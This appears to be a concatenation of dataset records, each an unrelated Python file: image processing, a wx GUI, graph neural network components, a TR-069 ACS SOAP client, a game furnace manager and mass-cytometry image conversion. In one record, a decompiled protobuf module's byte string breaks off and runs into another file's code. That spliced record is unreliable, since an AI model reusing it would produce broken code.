cv2.imshow(\"Frame\", sobelCombined)\n key = cv2.waitKey(100)\n if key == ord(\"q\"):\n break\ncv2.destroyAllWindows()\nvs.stop()\n","sub_path":"img_processing/f_my_edge_sobel.py","file_name":"f_my_edge_sobel.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549806564","text":"from wx import *\n\nclass MyApp(App):\n def OnInit(self):\n f = Frame(None, -1, \"Titulo\")\n p = Panel(f)\n s = BoxSizer(VERTICAL)\n t1 = self.t1 = TextCtrl(p)\n t2 = self.t2 = TextCtrl(p)\n b = Button(p, -1, \"Suma\")\n r = self.r = StaticText(p)\n b.Bind(EVT_BUTTON, self.sumar)\n s.Add(t1)\n s.Add(t2)\n s.Add(b)\n s.Add(r)\n p.SetSizer(s)\n f.Show()\n\n return True\n\n def sumar(self, e):\n self.r.SetLabel(str(int(self.t1.Value) + int(self.t2.Value)))\n\n\napp = MyApp()\napp.MainLoop()\n\n","sub_path":"18wx-001.py","file_name":"18wx-001.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"371279436","text":"from .layers import Linear\nfrom ..utils import glorot\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Discriminator(nn.Module):\n def __init__(self, name, dim, mlp_dim=None):\n super(Discriminator, self).__init__()\n self.dim = dim\n self.mlp_dim = mlp_dim\n self.layer = disc_dict[name.lower()](dim, mlp_dim)\n\n def forward(self, x, y, outer=False):\n score = self.layer(x, y, outer)\n return score\n\n\nclass InnerProd(nn.Module):\n def __init__(self, dim, mlp_dim):\n super(InnerProd, self).__init__()\n self.dim = dim\n\n def forward(self, x, y, outer=False):\n if outer:\n score = torch.matmul(x, y.transpose(1,0)) \n else:\n score = torch.sum((x * y), dim=-1)\n return score\n\n\nclass Bilinear(nn.Module):\n def __init__(self, dim, mlp_dim):\n super(Bilinear, self).__init__()\n self.dim = dim\n self.bil = nn.Bilinear(dim, dim, 1)\n self.weight = glorot([dim, dim])\n\n def forward(self, x, y, outer=False):\n if outer:\n score = torch.matmul(torch.matmul(x, self.weight), y.transpose(1,0))\n else:\n score = torch.squeeze(self.bil(x, y), dim=-1)\n return score\n\n\nclass MLP(nn.Module):\n def __init__(self, dim, mlp_dim):\n super(MLP, self).__init__()\n self.dim = dim\n self.layers = nn.ModuleList()\n self.mlp_dim = mlp_dim\n for i in range(1, len(self.mlp_dim) - 1):\n self.layers.append(Linear(self.mlp_dim[i - 1], self.mlp_dim[i], act=F.relu))\n self.layers.append(Linear(self.mlp_dim[-2], self.mlp_dim[-1], act=lambda x: x))\n\n def forward(self, x, y, outer=False):\n h = torch.cat([x, y], dim=1)\n for layer in self.layers:\n h = layer(h)\n return torch.squeeze(h, dim=-1)\n\n\ndisc_dict = {\n \"inner\": InnerProd,\n \"bilinear\": Bilinear,\n \"mlp\": MLP\n}\n","sub_path":"src/opengcl/framework/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314747050","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/svpino/dev/tensorflow-object-detection-sagemaker/todl/tensorflow-object-detection/research/object_detection/protos/anchor_generator_pb2.py\n# Compiled at: 2020-04-05 21:16:38\n# Size of source mod 2**32: 6890 bytes\nimport google.protobuf as _descriptor\nimport google.protobuf as _message\nimport google.protobuf as 
_reflection\nimport google.protobuf as _symbol_database\n_sym_db = _symbol_database.Default()\nimport object_detection.protos as object__detection_dot_protos_dot_flexible__grid__anchor__generator__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_grid__anchor__generator__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_multiscale__anchor__generator__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_ssd__anchor__generator__pb2\nDESCRIPTOR = _descriptor.FileDescriptor(name='object_detection/protos/anchor_generator.proto',\n package='object_detection.protos',\n syntax='proto2',\n serialized_options=None,\n serialized_pb=b'\\n.object_detection/protos/anchor_generator.proto\\x12\\x17object_detection.protos\\x1a 1]\n\n print('Building common features...')\n graph_ids, graph_texts, class_weights, node_classes, edge_classes, max_num_nodes, coarse_pos_tags, fine_pos_tags, \\\n node_texts = get_common_info(graphs, class_mapping)\n\n print('Calculating graph features...')\n # convert edge labels to ids\n for i, (_, g, _) in enumerate(graphs):\n for u, v, old_attrs in g.edges(data=True):\n edge_class_id = edge_classes.index(transform.get_label_for_edge(old_attrs))\n g.edges[u, v].update({\n 'class_one_hot': tf.one_hot(edge_class_id, depth=len(edge_classes), dtype=tf.float32),\n 'class_ordinal': edge_class_id\n })\n for n_id, old_attrs in g.nodes(data=True):\n node_class = transform.get_node_class_for_node(old_attrs, class_mapping)\n if node_class != transform.IRRELEVANT_CLASS:\n node_class_id = node_classes.index(node_class)\n node_class_one_hot = tf.one_hot(node_class_id, depth=len(node_classes), dtype=tf.float32)\n else:\n node_class_id = -1\n node_class_one_hot = tf.zeros((len(node_classes),))\n pos_tag_attrs = {}\n for pos_tags, pos_tag_names in [('coarse_pos_tags', coarse_pos_tags), ('fine_pos_tags', fine_pos_tags)]:\n pos_tag_ids = [pos_tag_names.index(p) for p in old_attrs.get(pos_tags, [transform.IRRELEVANT_CLASS])]\n pos_tag_attrs[f'{pos_tags}_ordinal'] = pos_tag_ids\n pos_tag_attrs[f'{pos_tags}_encoded'] = tf.math.add_n([\n tf.one_hot(i, depth=len(pos_tag_names))\n for i in pos_tag_ids\n ])\n g.nodes[n_id].update({\n 'class_one_hot': node_class_one_hot,\n 'class_ordinal': node_class_id,\n 'is_target': node_class not in [transform.IRRELEVANT_CLASS]\n })\n g.nodes[n_id].update(pos_tag_attrs)\n\n node_feature = node_feature_builder(n_id, old_attrs, g)\n if type(node_feature) in [int, float]:\n new_node_feature_len = 1\n elif type(node_feature) in [np.ndarray, tf.Tensor, EagerTensor]:\n new_node_feature_len = node_feature.shape[0]\n elif type(node_feature) in [list, set]:\n new_node_feature_len = len(node_feature)\n else:\n raise ValueError(f'Unsupported feature type {type(node_feature)}.')\n if node_feature_len is None:\n node_feature_len = new_node_feature_len\n else:\n assert node_feature_len == new_node_feature_len, 'Inconsistent node feature lengths. Make sure the ' \\\n 'FeatureBuilder always returns the same size features.' 
\\\n f'new: {new_node_feature_len} vs old: {node_feature_len}'\n g.nodes[n_id].update({\n 'feature': node_feature,\n })\n print(f'\\rDone with graph {i + 1}/{len(graphs)}', end='')\n print()\n\n print('Converting NetworkX graphs to DGL graphs...')\n dgl_graphs: Dict[int, dgl.DGLHeteroGraph] = {}\n for i, (g_id, g, _) in enumerate(graphs):\n dgl_graph: dgl.DGLHeteroGraph = dgl.from_networkx(\n g,\n edge_attrs=['class_one_hot', 'class_ordinal'],\n node_attrs=['class_one_hot', 'class_ordinal', 'is_target', 'feature']\n )\n dgl_graphs[i] = dgl_graph\n print(f'\\rDone with graph {i + 1}/{len(graphs)}', end='')\n print()\n\n return {\n 'ids': np.array(graph_ids),\n 'texts': graph_texts,\n 'class_weights': class_weights,\n 'node_classes': node_classes,\n 'edge_classes': edge_classes,\n 'max_num_nodes': max_num_nodes,\n 'node_feature_len': node_feature_len,\n\n 'dgl_graphs': dgl_graphs,\n\n 'node_texts': node_texts\n }\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Processing utility for our datasets.')\n parser.add_argument(\n '--dataset',\n required=True,\n type=str,\n help='Path to the dataset to process.'\n )\n parser.add_argument(\n '--target',\n required=True,\n type=str,\n help='Path to the target file.'\n )\n parser.add_argument(\n '--features',\n type=str,\n help='Node features to build.',\n default='none',\n choices=['none', *Word2VecFeatureBuilder.SUPPORTED_MODELS, 'debug', 'bert', 'fine-pos', 'coarse-pos', 'concat']\n )\n parser.add_argument(\n '--mappings',\n nargs='*',\n required=False,\n help='One or many class mappings in the form :, '\n 'e.g. to change all Events to Tasks use Event:Task'\n )\n args = parser.parse_args()\n\n feature_builder: BaseNodeFeatureBuilder\n if args.features == 'none' or args.features == 'None':\n feature_builder = IdNodeFeatureBuilder()\n elif args.features == 'debug':\n feature_builder = DebugFeatureBuilder()\n elif args.features == 'bert':\n feature_builder = BertFeatureBuilder()\n elif args.features in ['fine-pos', 'coarse-pos']:\n feature_builder = PosFeatureBuilder(args.features)\n elif args.features in Word2VecFeatureBuilder.SUPPORTED_MODELS:\n feature_builder = Word2VecFeatureBuilder(args.features)\n elif args.features == 'concat':\n feature_builder = ConcatFeatureBuilder()\n else:\n raise ValueError(f'Unknown feature builder \"{args.features}\"')\n\n class_mapping = {}\n if args.mappings:\n for mapping in args.mappings:\n source, target = mapping.split(':')\n if target == '':\n target = None\n class_mapping[source] = target\n print(f'Using class mapping {class_mapping}')\n\n print(f'Converting {args.dataset} to networkx graphs...')\n transformed_graphs = process_mrp_to_networkx(args.dataset)\n print('Done!')\n data = process_networkx_to_dgl(transformed_graphs, node_feature_builder=feature_builder, class_mapping=class_mapping)\n\n pickled = pickle.dumps(data)\n print(f'Writing approximately {len(pickled) / 1e6:.1f}MB of processed data to disk...')\n os.makedirs(os.path.dirname(args.target), exist_ok=True)\n with open(args.target, 'wb') as out_file:\n out_file.write(pickled)\n\n print('Done!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ucca4bpm/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":10408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335059852","text":"from PIL import Image, ImageDraw\nimport optparse\nimport face_recognition\n'''\n打印脸部特征轮廓\n'''\ndef faceFeature(picture):\n\t# 将jpg文件加载到numpy 数组中\n\timage = 
face_recognition.load_image_file(picture)\n\n\t# find all facial features for all the faces in the image\n\tface_landmarks_list = face_recognition.face_landmarks(image)\n\n\tprint(\"I found {} face(s) in this photograph.\".format(len(face_landmarks_list)))\n\n\tfor face_landmarks in face_landmarks_list:\n\n\t    # print the location of each facial feature in this image\n\t    facial_features = [\n\t        'chin',\n\t        'left_eyebrow',\n\t        'right_eyebrow',\n\t        'nose_bridge',\n\t        'nose_tip',\n\t        'left_eye',\n\t        'right_eye',\n\t        'top_lip',\n\t        'bottom_lip'\n\t    ]\n\n\t    for facial_feature in facial_features:\n\t        print(\"The {} in this face has the following points: {}\".format(facial_feature, face_landmarks[facial_feature]))\n\n\t    # let's trace out each facial feature on the image!\n\t    pil_image = Image.fromarray(image)\n\t    d = ImageDraw.Draw(pil_image)\n\n\t    for facial_feature in facial_features:\n\t        d.line(face_landmarks[facial_feature], width=5)\n\n\t    pil_image.show()\n\ndef main():\n\tparser = optparse.OptionParser('usage%prog '+'-p <picture>')\n\tparser.add_option('-p', dest='picture', type='string', help='specify picture file')\n\t(options, args) = parser.parse_args()\n\tpicture = options.picture\n\tif picture is None:\n\t\tprint(parser.usage)\n\t\texit(0)\n\tfaceFeature(picture)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"face_recognition/FaceFeature.py","file_name":"FaceFeature.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72454256","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 21 08:47:32 2020\n\n@author: xavi2\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\narr_pand = np.random.randint(0,10,6).reshape(2,3)\n\ndf1 = pd.DataFrame(arr_pand)\ns1 = df1[0]\ns2 = df1[1]\ns3 = df1[2]\n\ndf1[3] = s1\ndf1[4] = s1 * s2\n\ndatos_fisicos_uno = pd.DataFrame(\n    arr_pand,\n    columns = [\n        'Estatura (cm)',\n        'Peso (kg)',\n        'Edad (anios)'])\n\ndatos_fisicos_dos = pd.DataFrame(\n    arr_pand,\n    columns = [\n        'Estatura (cm)',\n        'Peso (kg)',\n        'Edad (anios)'],\n    index = [\n        'Rodman',\n        'Xavier'])\n\nserie_peso = datos_fisicos_dos['Peso (kg)']\ndatos_rodman = serie_peso['Rodman']\nprint(serie_peso)\nprint(datos_rodman)\n\ndf1.index = ['Rodman', 'Xavier']\ndf1.index = ['Wendy', 'Carolina']\ndf1.columns = ['A', 'B', 'C', 'D', 'E']\n","sub_path":"03-Pandas/c_dateframes.py","file_name":"c_dateframes.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368878092","text":"from zeep import Client\nfrom zeep.wsse.username import UsernameToken\nimport xmltodict\n\nimport os\n\nif \"BFT_DEBUG\" in os.environ:\n    import logging.config\n\n    logging.config.dictConfig({\n        'version': 1,\n        'formatters': {\n            'verbose': {\n                'format': '%(name)s: %(message)s'\n            }\n        },\n        'handlers': {\n            'console': {\n                'level': 'DEBUG',\n                'class': 'logging.StreamHandler',\n                'formatter': 'verbose',\n            },\n        },\n        'loggers': {\n            'zeep.transports': {\n                'level': 'DEBUG',\n                'propagate': True,\n                'handlers': ['console'],\n            },\n        }\n    })\n\nfrom boardfarm.lib.bft_logging import LoggerMeta\n\nclass FriendlyACS():\n    __metaclass__ = LoggerMeta\n    log = \"\"\n    log_calls = \"\"\n\n    model = \"friendly_acs_soap\"\n\n    def __init__(self, *args, **kwargs):\n        self.args = args\n        self.kwargs = kwargs\n        self.username = self.kwargs['username']\n        self.password = self.kwargs['password']\n        self.ipaddr = self.kwargs['ipaddr']\n        self.wsdl = \"http://\" + self.kwargs['ipaddr'] + \"/ftacsws/acsws.asmx?WSDL\"\n        self.client = Client(\n            wsdl=self.wsdl,\n            
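# zeep downloads and parses the WSDL up front; the WS-Security\n            # UsernameToken below is then attached to every SOAP call\n            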
wsse=UsernameToken(self.username, self.password))\n self.port = self.kwargs.get('port', '80')\n self.log = \"\"\n\n name = \"acs_server\"\n\n def __str__(self):\n return \"FriendlyACS\"\n\n def close(self):\n pass\n\n def get(self, serial_number, param, source=0):\n # source = 0 (CPE), source = 1 (DB)\n ret = self.client.service.FTGetDeviceParameters(devicesn=serial_number, source=source, arraynames=[param])\n if None == ret['Params']:\n return None\n else:\n return ret['Params']['ParamWSDL'][0]['Value']\n\n def set(self, serial_number, attr, value):\n array_of_param = self.client.get_type('{http://www.friendly-tech.com}ArrayOfParam')\n\n arr = array_of_param([{'Name': attr, 'Value': value}])\n\n # TODO: investigate push, endsession, reprovision, priority to make sure they are what we want\n self.client.service.FTSetDeviceParameters(devicesn=serial_number, \\\n arrayparams=arr, \\\n push=True, \\\n endsession=False, \\\n priority=0)\n\n def rpc(self, serial_number, name, content):\n ''' Invoke custom RPC on specific CM'''\n ret = self.client.service.FTRPCInvoke(devicesn=serial_number, rpcname=name, soapcontent=content)\n return xmltodict.parse(ret['Response'])\n\n def rpc_GetParameterAttributes(self, serial_number, name):\n content = ' %s ' % name\n\n ret = self.rpc(serial_number, name, content)\n\n return ret['cwmp:GetParameterAttributesResponse']['ParameterList']['ParameterAttributeStruct']\n\n def rpc_GetParameterValues(self, serial_number, name):\n content = ' %s ' % name\n\n ret = self.rpc(serial_number, name, content)\n\n return ret['cwmp:GetParameterValuesResponse']['ParameterList']['ParameterValueStruct']['Value']['#text']\n\n def getcurrent(self, serial_number, param, source=0):\n self.client.service.FTGetDeviceParameters(devicesn=serial_number, source=source, arraynames=[param+'.'])\n\n def rpc_SetParameterAttributes(self, serial_number, name, set_value):\n content = ' %s 1 %s 0 ' %(name, set_value)\n\n self.rpc(serial_number, name, content)\n\n def rpc_AddObject(self, serial_number, obj_name):\n content = ' %s. '% obj_name\n self.rpc(serial_number, obj_name, content)\n\n def rpc_DeleteObject(self, serial_number, obj_name):\n content = ' %s. 
' % obj_name\n self.rpc(serial_number, obj_name, content)\n\n def is_online(self, serial_number):\n ret = self.client.service.FTCPEStatus(devicesn=serial_number)\n return ret['Online']\n\nif __name__ == '__main__':\n import sys\n\n if ':' in sys.argv[1]:\n ip = sys.argv[1].split(':')[0]\n port = sys.argv[1].split(':')[1]\n else:\n ip = sys.argv[1]\n port = 80\n\n acs = FriendlyACS(ipaddr=ip, port=port, username=sys.argv[2], password=sys.argv[3])\n\n ret = acs.rpc_GetParameterAttributes('DEAP815610DA', 'Device.WiFi.SSID.1.SSID')\n print(ret['Notification'])\n\n ret = acs.get('DEAP815610DA', 'Device.DeviceInfo.SoftwareVersion')\n print(ret)\n\n ret = acs.get ('DEAP815610DA', 'Device.WiFi.SSID.1.SSID')\n print(ret)\n","sub_path":"boardfarm/devices/friendly_acs_soap.py","file_name":"friendly_acs_soap.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192381249","text":"from twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.task import LoopingCall\n\nfrom bravo.blocks import blocks, items, furnace_fuel, unstackable\nfrom bravo.inventory import Slot\nfrom bravo.inventory.windows import FurnaceWindow\n\n# TODO: move this out of the module into plug-in\nfurnace_recipes = {\n blocks[\"gold-ore\"].slot : Slot(items[\"gold-ingot\"].slot, 0, 1),\n blocks[\"iron-ore\"].slot : Slot(items[\"iron-ingot\"].slot, 0, 1),\n blocks[\"diamond-ore\"].slot : Slot(items[\"diamond\"].slot, 0, 1),\n blocks[\"log\"].slot : Slot(items[\"coal\"].slot, 1, 1), # charcoal\n blocks[\"cactus\"].slot : Slot(items[\"dye\"].slot, 2, 1), # green dye\n blocks[\"sand\"].slot : Slot(blocks[\"glass\"].slot, 0, 1),\n blocks[\"cobblestone\"].slot : Slot(blocks[\"stone\"].slot, 0, 1),\n items[\"clay-balls\"].slot : Slot(items[\"clay-brick\"].slot, 0, 1),\n items[\"raw-porkchop\"].slot : Slot(items[\"cooked-porkchop\"].slot, 0, 1),\n items[\"raw-fish\"].slot : Slot(items[\"cooked-fish\"].slot, 0, 1)\n}\n\nclass FurnaceManager(object):\n\n def __init__(self, factory):\n self.factory = factory\n self.furnaces = {}\n self.cleanup_timer = LoopingCall(self.cleanup)\n\n def start(self):\n \"\"\"\n Enable this manager.\n\n While this manager is running, furnaces will be reaped every 5\n minutes.\n \"\"\"\n\n self.cleanup_timer.start(300)\n\n def stop(self):\n self.cleanup_timer.stop()\n\n @inlineCallbacks\n def update(self, coords):\n # We've got informed that furnace content is changed\n if coords not in self.furnaces:\n bigx, smallx, bigz, smallz, y = coords\n chunk = yield self.factory.world.request_chunk(bigx, bigz)\n tile = chunk.tiles[(smallx, y, smallz)]\n self.furnaces[coords] = FurnaceProcess(tile, coords)\n self.furnaces[coords].factory = self.factory\n self.furnaces[coords].update()\n\n def remove(self, coords):\n if coords in self.furnaces:\n del(self.furnaces[coords])\n\n def cleanup(self):\n # remove processes that do not run\n for c in self.furnaces.keys():\n if not self.furnaces[c].running:\n self.remove(c)\n\nclass FurnaceProcess(object):\n '''\n NOTE: Our furnace process doesn't operate with world ticks.\n We do updates twice per second. 
It's our UI update rate.\n '''\n def __init__(self, tile, coords):\n self.tile = tile\n self.coords = coords\n self.running = False\n self.burning = LoopingCall(self.burn)\n\n def update(self):\n if not self.running:\n if self.hasFuel and self.canCraft:\n self.tile.burntime = 0\n self.tile.cooktime = 0\n self.burning.start(0.5) # start burning loop\n\n def burn(self):\n # -----------------------------\n # --- item crafting ---\n # -----------------------------\n if self.canCraft:\n self.tile.cooktime += 1\n # Notchian time is ~9.25-9.50 sec.\n if self.tile.cooktime == 20: # cooked!\n source = self.tile.inventory.crafting[0]\n product = furnace_recipes[source.primary]\n self.tile.inventory.crafting[0] = source.decrement()\n if self.tile.inventory.crafted[0] is None:\n self.tile.inventory.crafted[0] = product\n else:\n item = self.tile.inventory.crafted[0]\n self.tile.inventory.crafted[0] = item.increment(product.quantity)\n self.update_all_windows_slot(0, self.tile.inventory.crafting[0])\n self.update_all_windows_slot(2, self.tile.inventory.crafted[0])\n self.tile.cooktime = 0\n else:\n self.tile.cooktime = 0\n\n # ----------------------------\n # --- fuel consume ---\n # ----------------------------\n if self.tile.burntime == 0:\n if self.hasFuel and self.canCraft: # burn next portion of the fuel\n fuel = self.tile.inventory.fuel[0]\n self.tile.burntime = self.burn_max = furnace_fuel[fuel.primary]\n self.tile.inventory.fuel[0] = fuel.decrement()\n if not self.running:\n self.on_off(True)\n self.update_all_windows_slot(1, self.tile.inventory.fuel[0])\n else: # out of fuel or no need to burn more\n self.burning.stop()\n self.on_off(False)\n # reset cook time\n self.tile.cooktime = 0\n self.update_all_windows_progress(0, 0)\n return\n self.tile.burntime -= 1\n\n # ----------------------------\n # --- update progress bars ---\n # ----------------------------\n cook_progress = 185 * self.tile.cooktime / 19\n burn_progress = 250 * self.tile.burntime / self.burn_max\n self.update_all_windows_progress(0, cook_progress)\n self.update_all_windows_progress(1, burn_progress)\n\n def on_off(self, state):\n self.running = state\n bigx, smallx, bigz, smallz, y = self.coords\n block = state and blocks[\"burning-furnace\"] or blocks[\"furnace\"]\n d = self.factory.world.request_chunk(bigx, bigz)\n @d.addCallback\n def replace_furnace_block(chunk):\n chunk.set_block((smallx, y, smallz), block.slot)\n self.factory.flush_chunk(chunk)\n\n def update_all_windows_slot(self, slot, item):\n # update all opened windows\n for p in self.factory.protocols.itervalues():\n if p.windows and type(p.windows[-1]) == FurnaceWindow:\n window = p.windows[-1]\n if window.coords == self.coords:\n if item is None:\n p.write_packet(\"window-slot\",\n wid=window.wid, slot=slot, primary=-1)\n else:\n p.write_packet(\"window-slot\",\n wid=window.wid, slot=slot, primary=item.primary,\n secondary=item.secondary, count=item.quantity)\n\n def update_all_windows_progress(self, bar, value):\n # update all opened windows\n for p in self.factory.protocols.itervalues():\n if p.windows and type(p.windows[-1]) == FurnaceWindow:\n window = p.windows[-1]\n if window.coords == self.coords:\n p.write_packet(\"window-progress\", wid=window.wid,\n bar=bar, progress=value)\n\n @property\n def hasFuel(self):\n # if the furnace hase something to burn\n if self.tile.inventory.fuel[0] is None:\n return False\n else:\n return self.tile.inventory.fuel[0].primary in furnace_fuel\n\n @property\n def canCraft(self):\n # if have somethig to craft from...\n if 
self.tile.inventory.crafting[0] is None:\n return False\n if self.tile.inventory.crafting[0].primary in furnace_recipes:\n #...and has space for it\n if self.tile.inventory.crafted[0] is None:\n return True\n else:\n crafting = self.tile.inventory.crafting[0]\n crafted = self.tile.inventory.crafted[0]\n if furnace_recipes[crafting.primary][0] != crafted.primary:\n return False\n elif crafted.primary in unstackable:\n return False\n elif crafted.quantity + furnace_recipes[crafting.primary].quantity > 64:\n return False\n else:\n return True\n else:\n return False\n","sub_path":"bravo/utilities/furnace.py","file_name":"furnace.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156232353","text":"from __future__ import with_statement, division\n\nimport ij.process as process\nfrom ij import ImageStack\n\ntry:\n import sc.fiji.i5d.Image5D\n import sc.fiji.i5d as i5d\nexcept:\n import i5d.Image5D\n import i5d as i5d\n\nimport struct\n\nfrom loci.formats import ImageReader , MetadataTools, IFormatWriter, FormatTools\nimport ome.xml.model.enums.DimensionOrder as DimensionOrder\nimport ome.xml.model.primitives.PositiveInteger as PositiveInteger\nimport ome.xml.model.primitives.NonNegativeInteger as NonNegativeInteger\nimport ome.xml.model.enums.PixelType as PixelType\nfrom loci.formats import ImageWriter, ImageReader\nfrom loci.plugins import BF\nimport ome.units.quantity.Length as Length\nimport ome.units.UNITS as units\n\nimport loci.common.DataTools as DataTools\n\nimport xml.etree.ElementTree as et\n\n\ndef convert_imc_to_image(imc_acquisition):\n \"\"\"\n Load an MCD and convert it to a image5d Tiff\n :param filename: Filename of the MCD\n :return: an image5d image\n \"\"\"\n ac_id = imc_acquisition.image_ID\n print('Contstruct image from data: %s' %ac_id)\n\n img_channels = imc_acquisition.n_channels\n channel_names = imc_acquisition.channel_metals\n channel_labels = imc_acquisition.channel_labels\n\n img_data = imc_acquisition.get_img_stack_cyx()\n\n if channel_labels is not None:\n channel_ids = [lab + '_' + name for name, lab in\n zip(channel_names, channel_labels)]\n else:\n channel_ids = channel_names\n print('Add planes to stack:')\n imgstack = stack_to_imagestack(img_data, channel_ids=channel_ids)\n\n file_name = imc_acquisition.original_filename.replace('.mcd','')\n file_name = file_name.replace('.txt', '')\n description = imc_acquisition.image_description\n if description is not None:\n file_name = '_'.join((file_name,'a'+ac_id, 'd'+description))\n else:\n file_name = '_'.join((file_name, 'a' + ac_id))\n\n i5d_img = get_image5d(file_name, imgstack, channel_ids)\n\n i5d_img.setDefaultColors()\n print('finished image: %s' %ac_id)\n\n return i5d_img\n\n\ndef stack_to_imagestack(cxy_stack, img_stack=None, channel_ids=None):\n \"\"\"\n\n :param cxy_stack:\n :param img_stack:\n :return:\n \"\"\"\n\n c, x, y = (len(cxy_stack), len(cxy_stack[0]), len(cxy_stack[0][0]))\n if img_stack is None:\n img_stack = ImageStack(y, x)\n\n for i in range(c):\n cur_proc = process.FloatProcessor(cxy_stack[i])\n cur_proc.flipVertical()\n cur_proc = cur_proc.rotateRight()\n if channel_ids is None:\n img_stack.addSlice(cur_proc)\n else:\n img_stack.addSlice(channel_ids[i], cur_proc)\n\n return img_stack\n\n\ndef get_image5d(imgName, img_stack, channel_names):\n \"\"\"\n\n :param imgName:\n :param img_stack:\n :param channel_names:\n :return:\n \"\"\"\n\n nchannels = len(channel_names)\n for i, lab in 
enumerate(channel_names):\n img_stack.setSliceLabel(lab, i+1)\n i5dimg = i5d.Image5D(imgName, img_stack, nchannels,1,1)\n\n for i,cid in enumerate(channel_names):\n i5dimg.getChannelCalibration(i+1).setLabel(str(cid))\n\n i5dimg.setDefaultColors()\n return i5dimg\n\ndef load_ome_img(file_name):\n \"\"\"\n\n :param file_name:\n :return:\n \"\"\"\n imps = BF.openImagePlus(file_name)\n imag = imps[0]\n # parse metadata\n reader = ImageReader()\n omeMeta = MetadataTools.createOMEXMLMetadata()\n reader.setMetadataStore(omeMeta)\n reader.setId(file_name)\n print(omeMeta)\n reader.close()\n\n return (imag, omeMeta)\n\ndef generate_ome_fromimc(imc_acquisition):\n \"\"\"\n\n :param imc_acquisition:\n :return:\n \"\"\"\n\n y, x, c = imc_acquisition.shape\n print(x,y,c)\n metadata = MetadataTools.createOMEXMLMetadata()\n filename= '/home/vitoz/temp/test.ome.tiff'\n MetadataTools.populateMetadata(metadata, 0, filename, True, \"XYZTC\",\n FormatTools.getPixelTypeString(6), x, y, 1, c, 1, 1)\n if imc_acquisition.origin == 'mcd':\n ac_id = imc_acquisition.image_ID\n meta_xml = et.XML(imc_acquisition.original_metadata)\n ns = '{'+meta_xml.tag.split('}')[0].strip('{')+'}'\n\n channel_xml = [channel_xml for channel_xml in meta_xml.findall(ns + 'AcquisitionChannel')\n if channel_xml.find(ns + 'AcquisitionID').text == ac_id]\n\n ac_xml = [tx for tx in meta_xml.findall(ns + 'Acquisition')\n if tx.find(ns + 'ID').text == ac_id][0]\n # AcquisitionDate = ac_xml.find(ns+'StartTimeStamp').text\n # Description = ac_xml.find(ns+'Description').text\n # AblationPower = ac_xml.find(ns + 'AblationPower').text\n # AblationDistanceBetweenShots = ac_xml.find(ns + 'AblationDistanceBetweenShots').text\n # AblationFrequency = ac_xml.find(ns + 'AblationFrequency').text\n # ROIID = ac_xml.find(ns + 'ROIID').text\n # OrderNumber = ac_xml.find(ns + 'OrderNumber').text\n # SignalType = ac_xml.find(ns + 'SignalType').text\n # DataStartOffset = ac_xml.find(ns + 'DataStartOffset').text\n # DataEndOffset = ac_xml.find(ns + 'DataEndOffset').text\n # StartTimeStamp = ac_xml.find(ns + 'StartTimeStamp').text\n # EndTimeStamp = ac_xml.find(ns + 'EndTimeStamp').text\n # SegmentDataFormat = ac_xml.find(ns + 'SegmentDataFormat').text\n # ValueBytes = ac_xml.find(ns + 'ValueBytes').text\n #\n # chan_order = [int(cxml.find(ns+'OrderNumber').text) for cxml in channel_xml]\n metadata.setImageID(ac_id,0 )\n metadata.setImageName(ac_id,0)\n metadata.setPixelsDimensionOrder(DimensionOrder.XYCZT, 0)\n metadata.setPixelsSizeX(PositiveInteger(x), 0)\n metadata.setPixelsSizeY(PositiveInteger(y), 0)\n metadata.setPixelsSizeC(PositiveInteger(c), 0)\n metadata.setPixelsSizeZ(PositiveInteger(1), 0)\n metadata.setPixelsSizeT(PositiveInteger(1), 0)\n\n metadata.setPixelsPhysicalSizeX(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeY(Length(1, units.MICROM), 0)\n metadata.setPixelsPhysicalSizeZ(Length(1, units.MICROM), 0)\n\n metadata.setPixelsID(ac_id, 0)\n metadata.setPixelsType(PixelType.FLOAT, 0)\n metadata.setPixelsInterleaved(False, 0)\n\n # metadata.setTiffDataFirstC(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstZ(NonNegativeInteger(0), 0, 0)\n # metadata.setTiffDataFirstT(NonNegativeInteger(0), 0, 0)\n print(c)\n for i in range(c):\n metadata.setChannelSamplesPerPixel(PositiveInteger(1), 0, i)\n for cxml in channel_xml:\n cnr = int(cxml.find(ns+'OrderNumber').text)-3\n if cnr >=0:\n name = cxml.find(ns + 'ChannelName').text\n label = cxml.find(ns + 'ChannelLabel')\n if label.text is None:\n label = name\n else:\n 
